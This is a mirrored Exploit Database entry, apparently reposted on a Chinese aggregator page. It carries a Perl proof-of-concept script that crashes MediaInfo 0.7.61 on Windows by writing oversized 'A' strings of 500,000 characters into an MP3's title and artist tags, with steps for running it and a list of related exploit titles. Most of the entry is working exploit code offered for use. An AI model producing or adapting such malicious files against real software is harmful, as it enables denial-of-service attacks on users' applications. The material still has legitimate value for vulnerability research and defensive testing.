MediaInfo 0.7.61 – Crash (PoC)

Exploit Database
106 阅读

作者： Mohammad Reza Espargham

日期： 2016-05-10
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/39795/

#!/usr/bin/perl -w
# Title : Windows Media Player MediaInfo v0.7.61 - Buffer Overflow Exploit
# Tested on Windows 7 / Server 2008
# Download Link : https://sourceforge.net/projects/mediainfo/files/binary/mediainfo-gui/0.7.61/
#
#
# Author: Mohammad Reza Espargham
# Linkedin: https://ir.linkedin.com/in/rezasp
# E-Mail: reza.espargham@owasp.org
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.espargham
#
# Github : github.com/rezasp
#
#
#
# 1 . run perl code : perl reza.pl
# 2 . open 1.mp3 by mediainfo.exe
# 3 . Crashed ;)

use MP3::Tag;

$mp3 = MP3::Tag->new('1.mp3');
$mp3->title_set('A' x 500000);
$mp3->artist_set('A' x 500000);
$mp3->update_tags();
$mp3->close();

last Exploits
MediaInfo 0.7.61 – Crash (PoC)的更多信息

Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT – ActiveX Control PlayerPT.ocx sprintf Buffer Overflow (PoC)：
libtiff 3.9.5 – Integer Overflow：
VIM 8.2 – Denial of Service (PoC)：
Scite Text Editor 1.76 – Local Buffer Overflow (PoC)：
PrivateTunnel Client 2.8 – Local Buffer Overflow (SEH)：
ArGoSoft Mini Mail Server 1.0.0.2 – Denial of Service：
Apple Directory Services – Memory Corruption：
IBM solidDB 6.5.0.8 – ‘SELECT’ Statement ‘WHERE’ Condition Denial of Service：